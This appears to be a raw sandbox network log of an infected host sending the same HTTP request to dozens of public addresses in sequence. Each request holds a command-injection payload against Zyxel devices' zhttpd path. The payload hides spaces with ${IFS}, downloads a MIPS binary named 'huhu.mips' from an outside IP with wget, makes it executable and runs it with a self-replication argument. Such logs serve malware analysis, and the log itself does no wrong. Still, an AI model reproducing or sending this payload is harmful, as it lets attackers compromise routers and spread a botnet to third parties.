                                                  Jan 19, 2024 18:23:40.731827021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  622192.168.2.134040894.157.43.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731878042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  623192.168.2.1358822176.242.15.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731904030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  624192.168.2.1352074167.97.228.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731939077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  625192.168.2.1349610217.99.238.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731997967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  626192.168.2.134753078.28.50.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732024908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  627192.168.2.135832074.41.146.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732065916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  628192.168.2.134143827.175.49.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732119083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  629192.168.2.1354806177.186.111.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732160091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  630192.168.2.134480074.121.127.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732196093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  631192.168.2.1336162193.219.251.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732233047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  632192.168.2.1343872189.99.253.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732270956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  633192.168.2.1358808111.211.167.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732321978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  634192.168.2.135460274.193.221.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732341051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  635192.168.2.1358252193.98.42.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732373953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  636192.168.2.1356242223.240.144.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732435942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  637192.168.2.135948843.170.77.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732491970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  638192.168.2.134132082.60.86.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732506990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  639192.168.2.133752051.79.115.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732537985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  640192.168.2.1344868203.253.191.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732631922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  641192.168.2.135307220.32.2.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732631922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  642192.168.2.135863041.250.190.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732667923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  643192.168.2.1338900209.254.246.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732692003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  644192.168.2.1342690105.232.115.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732733965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  645192.168.2.133486419.56.241.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732778072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  646192.168.2.1356938108.183.26.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732815027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  647192.168.2.1349304181.235.238.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732868910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  648192.168.2.1353064220.184.112.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732896090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  649192.168.2.134776877.130.188.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732922077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  650192.168.2.1340324174.111.3.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.732969046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  651192.168.2.1335686166.162.203.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733010054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  652192.168.2.1350016123.66.224.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733055115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  653192.168.2.135015432.220.62.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733074903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  654192.168.2.1357000136.61.79.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733130932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  655192.168.2.1340502116.124.125.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733163118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  656192.168.2.1345214112.137.243.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733185053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  657192.168.2.133416012.1.31.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733236074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  658192.168.2.134982075.212.128.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733279943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  659192.168.2.1360958147.51.20.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733311892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  660192.168.2.134127460.191.40.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733341932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  661192.168.2.1339648205.159.132.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733412981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  662192.168.2.1357830208.137.114.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733443022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  663192.168.2.1344878149.232.104.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733503103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  664192.168.2.1343482207.31.145.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733526945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  665192.168.2.1348678120.70.140.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733582020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  666192.168.2.134229019.187.82.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733623981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  667192.168.2.135326281.79.89.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733645916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  668192.168.2.134926073.65.168.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733679056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  669192.168.2.1344824175.187.86.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733710051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  670192.168.2.134556636.2.25.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733746052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  671192.168.2.135435834.137.118.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733778954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  672192.168.2.133968871.60.186.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733824015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  673192.168.2.1339532190.53.242.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733855009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  674192.168.2.133812641.140.124.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733903885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  675192.168.2.1334178199.84.242.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733962059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  676192.168.2.135046041.101.190.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.733971119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  677192.168.2.1336264208.60.0.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734016895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  678192.168.2.1355656184.205.78.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734050989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  679192.168.2.1358414185.187.121.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734081030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  680192.168.2.1333130213.93.79.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734122038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  681192.168.2.1341354129.169.132.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734157085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  682192.168.2.1344518111.145.253.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734199047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  683192.168.2.134720238.41.7.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.734239101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  684192.168.2.1350644119.57.6.251443
                                                  TimestampBytes transferredDirectionData
